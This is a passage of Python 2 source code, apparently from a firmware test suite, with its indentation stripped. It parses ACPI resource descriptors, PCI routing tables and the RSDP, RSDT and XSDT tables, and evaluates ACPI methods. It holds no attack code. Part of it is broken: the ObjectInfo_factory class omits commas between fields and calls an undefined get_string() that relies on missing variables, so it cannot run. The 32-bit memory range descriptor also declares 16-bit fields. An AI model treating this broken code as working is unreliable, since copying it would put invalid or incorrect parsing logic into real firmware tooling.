print r
print repr(raw_descriptor)
if raw_descriptor is None:
continue
for descriptor in parse_descriptor(raw_descriptor):
print descriptor
print
class small_resource(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('length', ctypes.c_uint8, 3),
('item_name', ctypes.c_uint8, 4),
('rtype', ctypes.c_uint8, 1),
]
class large_resource(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('item_name', ctypes.c_uint8, 7),
('rtype', ctypes.c_uint8, 1),
]
SMALL_RESOURCE, LARGE_RESOURCE = 0, 1
class resource_data(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("small_resource",)
_fields_ = [
('small_resource', small_resource),
('large_resource', large_resource),
]
def parse_descriptor(buf):
large_factory = [
parse_VendorDefinedLargeDescriptor,
parse_ExtendedInterruptDescriptor,
]
small_factory = [
parse_IRQDescriptor,
parse_StartDependentFunctionsDescriptor,
parse_VendorDefinedSmallDescriptor,
]
large_descriptor_dict = {
1 : Memory24BitRangeDescriptor,
2 : GenericRegisterDescriptor,
4 : parse_VendorDefinedLargeDescriptor,
5 : Memory32BitRangeDescriptor,
6 : FixedMemory32BitRangeDescriptor,
7 : DwordAddressSpaceDescriptor,
8 : WordAddressSpaceDescriptor,
9 : parse_ExtendedInterruptDescriptor,
0xA : QwordAddressSpaceDescriptor,
0xB : ExtendedAddressSpaceDescriptor,
0xC : None,
0xE : None,
}
small_descriptor_dict = {
4 : parse_IRQDescriptor,
5 : DMADescriptor,
6 : parse_StartDependentFunctionsDescriptor,
7 : EndDependentFunctionsDescriptor,
8 : IOPortDescriptor,
9 : FixedIOPortDescriptor,
0xA : FixedDMADescriptor,
0xE : parse_VendorDefinedSmallDescriptor,
0xF : EndTagDescriptor,
}
descriptors = list()
current = 0
end = len(buf)
while current < end:
cls = None
res = resource_data.from_buffer_copy(buf, current)
if res.rtype == LARGE_RESOURCE:
cls = large_descriptor_dict.get(res.large_resource.item_name)
elif res.rtype == SMALL_RESOURCE:
cls = small_descriptor_dict.get(res.small_resource.item_name)
if cls is not None:
if cls in large_factory or cls in small_factory:
descriptor = cls(buf[current:]).from_buffer_copy(buf, current)
else:
descriptor = cls.from_buffer_copy(buf, current)
current += descriptor.length
if res.rtype == LARGE_RESOURCE:
current += 3
elif res.rtype == SMALL_RESOURCE:
current += 1
descriptors.append(descriptor)
else:
return AcpiBuffer(buf[current:])
if len(descriptors):
return tuple(d for d in descriptors)
return buf
class IRQDescriptor2(bits.cdata.Struct):
"""IRQ Descriptor (Length=2)"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) + [
('_INT', ctypes.c_uint16),
]
_interrupt_sharing_wakes = {
0x0: "Exclusive",
0x1: "Shared",
0x2: "ExclusiveAndWake",
0x3: "SharedAndWake",
}
_interrupt_polarities = {
0: "Active-High",
1: "Active-Low",
}
_interrupt_modes = {
0 : "Level-Triggered",
1 : "Edge-Triggered",
}
class irq_information_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('_HE', ctypes.c_uint8, 1),
('reserved', ctypes.c_uint8, 2),
('_LL', ctypes.c_uint8, 1),
('_SHR', ctypes.c_uint8, 2),
]
_formats = {
'_HE': unpack.format_table("{}", _interrupt_modes),
'_LL': unpack.format_table("{}", _interrupt_polarities),
'_SHR': unpack.format_table("{}", _interrupt_sharing_wakes),
}
class irq_information(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', irq_information_bits),
]
class IRQDescriptor3(bits.cdata.Struct):
"""IRQ Descriptor (Length=3)"""
_pack_ = 1
_fields_ = copy.copy(IRQDescriptor2._fields_) +[
('information', irq_information),
]
def parse_IRQDescriptor(buf):
des = small_resource.from_buffer_copy(buf)
if des.length == 2:
return IRQDescriptor2
return IRQDescriptor3
class dma_mask_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('_SIZ', ctypes.c_uint8, 2),
('_BM', ctypes.c_uint8, 1),
('_TYP', ctypes.c_uint8, 2),
]
dma_types = {
0b00: "compatibility mode",
0b01: "Type A",
0b10: "Type B",
0b11: "Type F",
}
logical_device_bus_master_status = {
0: "Logical device is not a bus master",
1: "Logical device is a bus master",
}
transfer_type_preferences = {
0b00: "8-bit only",
0b01: "8- and 16-bit",
0b10: "16-bit only",
}
_formats = {
'_SIZ': unpack.format_table("{}", transfer_type_preferences),
'_BM': unpack.format_table("{}", logical_device_bus_master_status),
'_TYP': unpack.format_table("{}", dma_types),
}
class dma_mask(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', dma_mask_bits),
]
class DMADescriptor(bits.cdata.Struct):
"""DMA Descriptor"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) +[
('_DMA', ctypes.c_uint8),
('mask', ctypes.c_uint8),
]
class StartDependentFunctionsDescriptor0(bits.cdata.Struct):
"""Start Dependent Functions Descriptor (length=0)"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_)
class priority_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('compatibility_priority', ctypes.c_uint8, 2),
('performance_robustness', ctypes.c_uint8, 2),
]
configurations = {
0: "Good configuration",
1: "Acceptable configuration",
2: "Sub-optimal configuration",
}
_formats = {
'compatibility_priority': unpack.format_table("priority[1:0]={}", configurations),
'performance_robustness': unpack.format_table("priority[3:2]={}", configurations),
}
class priority(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', priority_bits),
]
class StartDependentFunctionsDescriptor1(bits.cdata.Struct):
"""Start Dependent Functions Descriptor (length=1)"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) +[
('priority', priority),
]
def parse_StartDependentFunctionsDescriptor(buf):
des = small_resource.from_buffer_copy(buf)
if des.length == 0:
return StartDependentFunctionsDescriptor0
return StartDependentFunctionsDescriptor1
class EndDependentFunctionsDescriptor(bits.cdata.Struct):
"""End Dependent Functions Descriptor"""
_fields_ = copy.copy(small_resource._fields_)
class ioport_information_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('_DEC', ctypes.c_uint8, 1),
]
_dec_statuses = {
1 : "logical device decodes 16-bit addresses",
0 : "logical device only decodes address bits[9:0]",
}
_formats = {
'_DEC': unpack.format_table("{}", _dec_statuses),
}
class ioport_information(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', ioport_information_bits),
]
class IOPortDescriptor(bits.cdata.Struct):
"""I/O Port Descriptor"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) +[
('ioport_information', ioport_information),
('_MIN', ctypes.c_uint16),
('_MAX', ctypes.c_uint16),
('_ALN', ctypes.c_uint8),
('_LEN', ctypes.c_uint8),
]
class FixedIOPortDescriptor(bits.cdata.Struct):
"""Fixed Location I/O Port Descriptor"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) + [
('_BAS', ctypes.c_uint16),
('_LEN', ctypes.c_uint8),
]
class FixedDMADescriptor(bits.cdata.Struct):
"""Fixed DMA Descriptor"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) + [
('_DMA', ctypes.c_uint16),
('_TYPE', ctypes.c_uint16),
('_SIZ', ctypes.c_uint8),
]
_dma_transfer_widths = {
0x00: "8-bit",
0x01: "16-bit",
0x02: "32-bit",
0x03: "64-bit",
0x04: "128-bit",
0x05: "256-bit",
}
_formats = {
'_SIZ': unpack.format_table("DMA transfer width={}", _dma_transfer_widths),
}
def VendorDefinedSmallDescriptor_factory(num_vendor_bytes):
"""Vendor-Defined Descriptor"""
class VendorDefinedSmallDescriptor(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) + [
('vendor_byte_list', ctypes.c_uint8 * num_vendor_bytes),
]
return VendorDefinedSmallDescriptor
def parse_VendorDefinedSmallDescriptor(buf):
des = VendorDefinedSmallDescriptor_factory(0)
num_vendor_bytes = len(buf) - ctypes.sizeof(des)
return VendorDefinedSmallDescriptor_factory(num_vendor_bytes)
class EndTagDescriptor(bits.cdata.Struct):
"""End Tag"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) + [
('checksum', ctypes.c_uint8),
]
class memory_range_information_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('_RW', ctypes.c_uint8, 1),
]
_rw_statuses = {
1: "writeable (read/write)",
0: "non-writeable (read-only)",
}
_formats = {
'_RW': unpack.format_table("{}", _rw_statuses),
}
class memory_range_information(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', memory_range_information_bits),
]
class Memory24BitRangeDescriptor(bits.cdata.Struct):
"""Memory 24-Bit Range Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('information', memory_range_information),
('_MIN', ctypes.c_uint16),
('_MAX', ctypes.c_uint16),
('_ALN', ctypes.c_uint16),
('_LEN', ctypes.c_uint16),
]
def VendorDefinedLargeDescriptor_factory(num_vendor_bytes):
"""Vendor-Defined Descriptor"""
class VendorDefinedLargeDescriptor(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('uuid_sub_type', ctypes.c_uint8),
('uuid', bits.cdata.GUID),
('vendor_byte_list', ctypes.c_uint8 * num_vendor_bytes),
]
return VendorDefinedLargeDescriptor
def parse_VendorDefinedLargeDescriptor(buf):
des = VendorDefinedLargeDescriptor_factory(0)
num_vendor_bytes = len(buf) - ctypes.sizeof(des)
return VendorDefinedLargeDescriptor_factory(num_vendor_bytes)
class Memory32BitRangeDescriptor(bits.cdata.Struct):
"""32-Bit Memory Range Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('information', memory_range_information),
('_MIN', ctypes.c_uint16),
('_MAX', ctypes.c_uint16),
('_ALN', ctypes.c_uint16),
('_LEN', ctypes.c_uint16),
]
class FixedMemory32BitRangeDescriptor(bits.cdata.Struct):
"""32-Bit Fixed Memory Range Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('information', memory_range_information),
('_BAS', ctypes.c_uint32),
('_LEN', ctypes.c_uint32),
]
def _range_type_str(range_type):
if range_type >= 192 and range_type <= 255:
return 'OEM Defined'
_range_types = {
0: 'Memory range',
1: 'IO range',
2: 'Bus number range',
}
return _range_types.get(range_type, 'Reserved')
_decode_type = {
1: "bridge subtractively decodes (top level bridges only)",
0: "bridge positively decodes",
}
_min_address_fixed = {
1: "specified minimum address is fixed",
0: "specified minimum address is not fixed and can be changed",
}
_max_address_fixed = {
1: "specified maximum address is fixed",
0: "specified maximum address is not fixed",
}
class _resource_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('reserved_0', ctypes.c_uint8, 1),
('_DEC', ctypes.c_uint8, 1),
('_MIF', ctypes.c_uint8, 1),
('_MAF', ctypes.c_uint8, 1),
('reserved_7_4', ctypes.c_uint8, 1),
]
_formats = {
'_DEC': unpack.format_table("{}", _decode_type),
'_MIF': unpack.format_table("{}", _min_address_fixed),
'_MAF': unpack.format_table("{}", _max_address_fixed),
}
class _resource_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', _resource_flags_bits),
]
class DwordAddressSpaceDescriptor(bits.cdata.Struct):
"""DWord Address Space Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('range_type', ctypes.c_uint8),
('general_flags', _resource_flags),
('type_specific_flags', ctypes.c_uint8),
('address_space_granularity', ctypes.c_uint32),
('address_range_minimum', ctypes.c_uint32),
('address_range_maximum', ctypes.c_uint32),
('address_translation_offset', ctypes.c_uint32),
('address_length', ctypes.c_uint32),
]
_formats = {
'range_type': unpack.format_function("{:#x}", _range_type_str),
}
class WordAddressSpaceDescriptor(bits.cdata.Struct):
"""Word Address Space Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('range_type', ctypes.c_uint8),
('general_flags', _resource_flags),
('type_specific_flags', ctypes.c_uint8),
('address_space_granularity', ctypes.c_uint16),
('address_range_minimum', ctypes.c_uint16),
('address_range_maximum', ctypes.c_uint16),
('address_translation_offset', ctypes.c_uint16),
('address_length', ctypes.c_uint16),
]
_formats = {
'range_type': unpack.format_function("{:#x}", _range_type_str),
}
_consumer_producer = {
1: "device consumes this resource",
0: "device produces and consumes this resource",
}
class interrupt_vector_info_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('consumer_producer', ctypes.c_uint8, 1),
('_HE', ctypes.c_uint8, 1),
('_LL', ctypes.c_uint8, 1),
('_SHR', ctypes.c_uint8, 2),
('reserved_7_5', ctypes.c_uint8, 3),
]
_formats = {
'consumer_producer': unpack.format_table("{}", _consumer_producer),
'_HE': unpack.format_table("{}", _interrupt_modes),
'_LL': unpack.format_table("{}", _interrupt_polarities),
'_SHR': unpack.format_table("{}", _interrupt_sharing_wakes),
}
class interrupt_vector_info(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', interrupt_vector_info_bits),
]
def ExtendedInterruptDescriptor_factory(num_interrupts):
class ExtendedInterruptDescriptor(bits.cdata.Struct):
"""Extended Address Space Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('interrupt_vector_flags', interrupt_vector_info),
('interrupt_table_length', ctypes.c_uint8),
('interrupt_number', ctypes.c_uint32 * num_interrupts),
]
return ExtendedInterruptDescriptor
def parse_ExtendedInterruptDescriptor(buf):
res = ExtendedInterruptDescriptor_factory(0).from_buffer_copy(buf)
return ExtendedInterruptDescriptor_factory(res.interrupt_table_length)
class QwordAddressSpaceDescriptor(bits.cdata.Struct):
"""QWord Address Space Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('range_type', ctypes.c_uint8),
('general_flags', _resource_flags),
('type_specific_flags', ctypes.c_uint8),
('address_space_granularity', ctypes.c_uint64),
('address_range_minimum', ctypes.c_uint64),
('address_range_maximum', ctypes.c_uint64),
('address_translation_offset', ctypes.c_uint64),
('address_length', ctypes.c_uint64),
]
_formats = {
'range_type': unpack.format_function("{:#x}", _range_type_str)
}
class ExtendedAddressSpaceDescriptor(bits.cdata.Struct):
"""Extended Address Space Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('resource_type', ctypes.c_uint8),
('general_flags', _resource_flags),
('type_specific_flags', ctypes.c_uint8),
('revision_id', ctypes.c_uint8),
('reserved', ctypes.c_uint8),
('address_range_granularity', ctypes.c_uint64),
('address_range_minimum', ctypes.c_uint64),
('address_range_maximum', ctypes.c_uint64),
('address_translation_offset', ctypes.c_uint64),
('address_length', ctypes.c_uint64),
('type_specific_attribute', ctypes.c_uint64),
]
_formats = {
'resource_type': unpack.format_function("{:#x}", _range_type_str)
}
class AcpiLocalReference(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('ActualType', ctypes.c_uint32),
('NamePath', ctypes.c_char_p)
]
class _adr_pci(bits.cdata.Struct):
"""_ADR encoding for PCI bus"""
_pack_ = 1
_fields_ = [
('function', ctypes.c_uint32, 16),
('device', ctypes.c_uint32, 16),
]
class pci_address(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', _adr_pci),
]
class PciRoutingTablePIC(bits.cdata.Struct):
"""PCI Routing Table Entry using PIC mode"""
_pack_ = 1
_fields_ = [
('address', pci_address),
('pin', ctypes.c_uint8),
('source', ctypes.c_uint8),
('source_index', ctypes.c_uint32),
]
class PciRoutingTablePICgsi(bits.cdata.Struct):
"""PCI Routing Table Entry using PIC mode and specifying a Global System Interrupt (GSI)"""
_pack_ = 1
_fields_ = [
('address', pci_address),
('pin', ctypes.c_uint8),
('source', ctypes.c_uint8),
('global_system_interrupt', ctypes.c_uint32),
]
class PciRoutingTableAPIC(bits.cdata.Struct):
"""PCI Routing Table Entry using APIC mode"""
_pack_ = 1
_fields_ = [
('address', pci_address),
('pin', ctypes.c_uint8),
('source', AcpiLocalReference),
('source_index', ctypes.c_uint32),
]
def parse_prt(pkg):
"""Parse PCI Routing Table (PRT) Entries"""
if isinstance(pkg, tuple):
if len(pkg) == 4:
if isinstance(pkg[2], AcpiLocalReference):
return PciRoutingTableAPIC(pci_address(pkg[0]), *pkg[1:])
if issubclass(type(pkg[2]), (int, long)):
if pkg[2] == 0:
return PciRoutingTablePICgsi(pci_address(pkg[0]), *pkg[1:])
else:
return PciRoutingTablePIC(pci_address(pkg[0]), *pkg[1:])
return pkg
def make_prt(data):
if data is None:
return None
data = parse_prt(data)
if isinstance(data, tuple):
return tuple(make_prt(v) for v in data)
return data
def display_prt(name="_PRT"):
with ttypager.page():
for path in get_objpaths(name):
print path
for prt in make_prt(evaluate(path)):
print prt
print
class AcpiPower(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('SystemLevel', ctypes.c_uint32),
('ResourceOrder', ctypes.c_uint32)
]
class AcpiProcessor(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('ProcId', ctypes.c_uint32),
('PblkAddress', ctypes.c_uint64),
('PblkLength', ctypes.c_uint32),
]
# ACPI_OBJECT_TYPE values
assert _acpi.ACPI_TYPE_EXTERNAL_MAX == 16, "Internal error: ACPI_OBJECT_TYPE enumeration not updated for new ACPICA"
(
ACPI_TYPE_ANY,
ACPI_TYPE_INTEGER,
ACPI_TYPE_STRING,
ACPI_TYPE_BUFFER,
ACPI_TYPE_PACKAGE,
ACPI_TYPE_FIELD_UNIT,
ACPI_TYPE_DEVICE,
ACPI_TYPE_EVENT,
ACPI_TYPE_METHOD,
ACPI_TYPE_MUTEX,
ACPI_TYPE_REGION,
ACPI_TYPE_POWER,
ACPI_TYPE_PROCESSOR,
ACPI_TYPE_THERMAL,
ACPI_TYPE_BUFFER_FIELD,
ACPI_TYPE_DDB_HANDLE,
ACPI_TYPE_DEBUG_OBJECT,
) = range(_acpi.ACPI_TYPE_EXTERNAL_MAX + 1)
ACPI_TYPE_LOCAL_REFERENCE = 0x14
_acpi_object_types = {
ACPI_TYPE_INTEGER: _id,
ACPI_TYPE_STRING: _id,
ACPI_TYPE_BUFFER: AcpiBuffer,
ACPI_TYPE_PACKAGE: (lambda t: tuple(_acpi_object_to_python(v) for v in t)),
ACPI_TYPE_POWER: (lambda args: AcpiPower(*args)),
ACPI_TYPE_PROCESSOR: (lambda args: AcpiProcessor(*args)),
ACPI_TYPE_LOCAL_REFERENCE: (lambda args: AcpiLocalReference(*args)),
}
def _acpi_object_to_python(acpi_object):
if acpi_object is None:
return None
object_type, value = acpi_object
return _acpi_object_types[object_type](value)
def ctypes_to_python(data):
if data is None:
return None
if isinstance(data, (list, tuple)):
return tuple(ctypes_to_python(v) for v in data)
if issubclass(type(data), (bits.cdata.Struct, bits.cdata.Union)):
return tuple(ctypes_to_python(getattr(data, f[0])) for f in data._fields_)
return data
def make_resources(data):
if data is None:
return None
if isinstance(data, tuple):
return tuple(make_resources(v) for v in data)
if isinstance(data, AcpiBuffer):
return parse_descriptor(data)
return data
def _acpi_object_from_python(obj):
if isinstance(obj, (int, long)):
return (ACPI_TYPE_INTEGER, obj)
# Must check AcpiBuffer before str, since AcpiBuffer derives from str
if isinstance(obj, AcpiBuffer):
return (ACPI_TYPE_BUFFER, obj)
if isinstance(obj, str):
return (ACPI_TYPE_STRING, obj)
if isinstance(obj, AcpiPower):
return (ACPI_TYPE_POWER, obj)
if isinstance(obj, AcpiProcessor):
return (ACPI_TYPE_PROCESSOR, obj)
# Must check tuple after any namedtuples, since namedtuples derive from tuple
if isinstance(obj, tuple):
return (ACPI_TYPE_PACKAGE, tuple(_acpi_object_from_python(arg) for arg in obj))
def evaluate(pathname, *args, **kwargs):
"""Evaluate an ACPI method and return the result.
By default, ACPI method evaluation allows reads and writes of I/O ports.
Pass the keyword argument unsafe_io=False to silently ignore I/O
operations."""
global acpi_unsafe_io
unsafe_io = kwargs.get("unsafe_io")
if unsafe_io is not None:
old_unsafe_io = acpi_unsafe_io
acpi_unsafe_io = unsafe_io
try:
return _acpi_object_to_python(_acpi._eval(pathname, tuple(_acpi_object_from_python(arg) for arg in args)))
finally:
if unsafe_io is not None:
acpi_unsafe_io = old_unsafe_io
acpi_object_types = {
ACPI_TYPE_INTEGER: 'ACPI_TYPE_INTEGER',
ACPI_TYPE_STRING: 'ACPI_TYPE_STRING',
ACPI_TYPE_BUFFER: 'ACPI_TYPE_BUFFER',
ACPI_TYPE_PACKAGE: 'ACPI_TYPE_PACKAGE',
ACPI_TYPE_FIELD_UNIT: 'ACPI_TYPE_FIELD_UNIT',
ACPI_TYPE_DEVICE: 'ACPI_TYPE_DEVICE',
ACPI_TYPE_EVENT: 'ACPI_TYPE_EVENT',
ACPI_TYPE_METHOD: 'ACPI_TYPE_METHOD',
ACPI_TYPE_MUTEX: 'ACPI_TYPE_MUTEX',
ACPI_TYPE_REGION: 'ACPI_TYPE_REGION',
ACPI_TYPE_POWER: 'ACPI_TYPE_POWER',
ACPI_TYPE_PROCESSOR: 'ACPI_TYPE_PROCESSOR',
ACPI_TYPE_THERMAL: 'ACPI_TYPE_THERMAL',
ACPI_TYPE_BUFFER_FIELD: 'ACPI_TYPE_BUFFER_FIELD',
ACPI_TYPE_DDB_HANDLE: 'ACPI_TYPE_DDB_HANDLE',
ACPI_TYPE_DEBUG_OBJECT: 'ACPI_TYPE_DEBUG_OBJECT',
ACPI_TYPE_LOCAL_REFERENCE: 'ACPI_TYPE_LOCAL_REFERENCE',
}
def ObjectInfo_factory(ids_length):
class object_info_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('current_status_valid', ctypes.c_uint8, 1),
('address_valid', ctypes.c_uint8, 1),
('hardware_id_valid', ctypes.c_uint8, 1),
('unique_id_valid', ctypes.c_uint8, 1),
('subsystem_id_valid', ctypes.c_uint8, 1),
('compatibility_id_valid', ctypes.c_uint8, 1),
('highest_dstates_valid', ctypes.c_uint8, 1),
('lowest_dstates_valid', ctypes.c_uint8, 1),
]
class object_info_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', object_info_flags_bits),
]
class current_status_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('present', ctypes.c_uint32, 1),
('enabled', ctypes.c_uint32, 1),
('visible', ctypes.c_uint32, 1),
('functional', ctypes.c_uint32, 1),
('battery_present', ctypes.c_uint32, 1),
]
class current_status_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', current_status_flags_bits),
]
class ObjectInfo_factory(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('info_size', ctypes.c_uint32),
('name', ctypes.c_char * 4),
('object_type', ctypes.c_uint32),
('parameter_count', ctypes.c_uint8),
('valid', ctypes.c_uint8),
('flags', object_info_flags),
('highest_dstates', ctypes.c_uint8 * 4),
('lowest_dstates', ctypes.c_uint8 * 5),
('current_status', current_status_flags),
('address', ctypes.c_uint64),
('hardware_id', get_string())
('unique_id', get_string())
('subsystem_id', get_string())
('compatibility_id_count', ctypes.c_uint32),
('compatibility_id_length', ctypes.c_uint32),
('ids', ctypes.c_uint8 * ids_length),
]
_formats = {
'object_type': unpack.format_table("{}", acpi_object_types),
}
def get_string():
length, offset = u.unpack("IP")
if not length:
return None
return s.unpack_peek_one("{}x{}s".format(offset - addr, length)).split("\x00", 1)[0]
class ObjectInfo(unpack.Struct):
def __init__(self, data, addr):
super(ObjectInfo, self).__init__()
u = unpack.Unpackable(data)
s = unpack.Unpackable(data)
self.add_field('info_size', u.unpack_one("<I"))
self.add_field('name', u.unpack_one("4s"))
self.add_field('object_type', u.unpack_one("<I"), unpack.format_table("{}", acpi_object_types))
self.add_field('parameter_count', u.unpack_one("B"))
self.add_field('valid', u.unpack_one("B"))
self.add_field('current_status_valid', bool(bitfields.getbits(self.valid, 0)), "valid[0]={}")
self.add_field('address_valid', bool(bitfields.getbits(self.valid, 1)), "valid[1]={}")
self.add_field('hardware_id_valid', bool(bitfields.getbits(self.valid, 2)), "valid[2]={}")
self.add_field('unique_id_valid', bool(bitfields.getbits(self.valid, 3)), "valid[3]={}")
self.add_field('subsystem_id_valid', bool(bitfields.getbits(self.valid, 4)), "valid[4]={}")
self.add_field('compatibility_id_valid', bool(bitfields.getbits(self.valid, 5)), "valid[5]={}")
self.add_field('highest_dstates_valid', bool(bitfields.getbits(self.valid, 6)), "valid[6]={}")
self.add_field('lowest_dstates_valid', bool(bitfields.getbits(self.valid, 7)), "valid[7]={}")
self.add_field('flags', u.unpack_one("B"))
self.add_field('highest_dstates', tuple(u.unpack_one("B") for i in range(4)))
self.add_field('lowest_dstates', tuple(u.unpack_one("B") for i in range(5)))
self.add_field('current_status', u.unpack_one("<I"))
if self.current_status_valid:
self.add_field('present', bool(bitfields.getbits(self.current_status, 0)), "current_status[0]={}")
self.add_field('enabled', bool(bitfields.getbits(self.current_status, 1)), "current_status[1]={}")
self.add_field('visible', bool(bitfields.getbits(self.current_status, 2)), "current_status[2]={}")
self.add_field('functional', bool(bitfields.getbits(self.current_status, 3)), "current_status[3]={}")
self.add_field('battery_present', bool(bitfields.getbits(self.current_status, 4)), "current_status[4]={}")
# Deal with padding before the 8-byte address field
ptralign = struct.calcsize("I0P")
if u.offset % ptralign != 0:
u.skip(ptralign - (u.offset % ptralign))
self.add_field('address', u.unpack_one("<Q"))
def get_string():
length, offset = u.unpack("IP")
if not length:
return None
return s.unpack_peek_one("{}x{}s".format(offset - addr, length)).split("\x00", 1)[0]
self.add_field('hardware_id', get_string())
self.add_field('unique_id', get_string())
self.add_field('subsystem_id', get_string())
self.add_field('compatibility_id_count', u.unpack_one("<I"))
self.add_field('compatibility_id_length', u.unpack_one("<I"))
self.add_field('compatibility_ids', tuple(get_string() for i in range(self.compatibility_id_count)))
def scope(path):
try:
prefix, _ = path.rsplit('.', 1)
return prefix
except ValueError:
return "/"
def parse_table(signature, instance=1):
addr = get_table_addr(signature, instance)
if addr is None:
return None
signature = string.rstrip(signature,"!")
return globals()[signature](addr)
def make_compat_parser(signature):
def parse(printflag=False, instance=1):
table = parse_table(signature, instance)
if table is None:
return None
if printflag:
with ttypager.page():
print table
return table
return parse
class RSDP_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('signature', ctypes.c_char * 8),
('checksum', ctypes.c_uint8),
('oemid', ctypes.c_char * 6),
('revision', ctypes.c_uint8),
('rsdt_address', ctypes.c_uint32),
]
class RSDP_v2(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(RSDP_v1._fields_) + [
('length', ctypes.c_uint32),
('xsdt_address', ctypes.c_uint64),
('extended_checksum', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 3),
]
def RSDP(val):
"""Create class based on decode of an RSDP table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
r = RSDP_v1.from_address(addr)
cls = RSDP_v1
if r.revision == 2:
cls = RSDP_v2
if isinstance(val, str):
return cls.from_buffer_copy(data)
return cls.from_address(addr)
parse_rsdp = make_compat_parser("RSDP")
class TableHeader(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('signature', ctypes.c_char * 4),
('length', ctypes.c_uint32),
('revision', ctypes.c_ubyte),
('checksum', ctypes.c_ubyte),
('oemid', ctypes.c_char * 6),
('oemtableid', ctypes.c_char * 8),
('oemrevision', ctypes.c_uint32),
('creatorid', ctypes.c_char * 4),
('creatorrevision', ctypes.c_uint32),
]
def format_table_addrs(addrs):
return "(\n{})".format(",\n".join("{:#x} ({})".format(addr, (ctypes.c_char * 4).from_address(addr).raw) for addr in addrs))
def rsdt_factory(num_tables, no_formats=False):
formats = { 'tables': format_table_addrs, }
if no_formats:
formats = dict()
class RSDT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('tables', ctypes.c_uint32 * num_tables),
]
_formats = formats
return RSDT_v1
def RSDT(val):
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
num_tables = (hdr.length - ctypes.sizeof(TableHeader)) / ctypes.sizeof(ctypes.c_uint32)
if isinstance(val, str):
return rsdt_factory(num_tables, no_formats=True).from_buffer_copy(data)
return rsdt_factory(num_tables).from_address(addr)
parse_rsdt = make_compat_parser("RSDT")
def xsdt_factory(num_tables, no_formats=False):
formats = { 'tables': format_table_addrs, }
if no_formats:
formats = dict()
class XSDT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('tables', ctypes.c_uint64 * num_tables),
]
_formats = formats
return XSDT_v1
def XSDT(val):
"""Create class based on decode of an XSDT table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
num_tables = (hdr.length - ctypes.sizeof(TableHeader)) / ctypes.sizeof(ctypes.c_uint64)
if isinstance(val, str):
return xsdt_factory(num_tables, no_formats=True).from_buffer_copy(data)
return xsdt_factory(num_tables).from_address(addr)
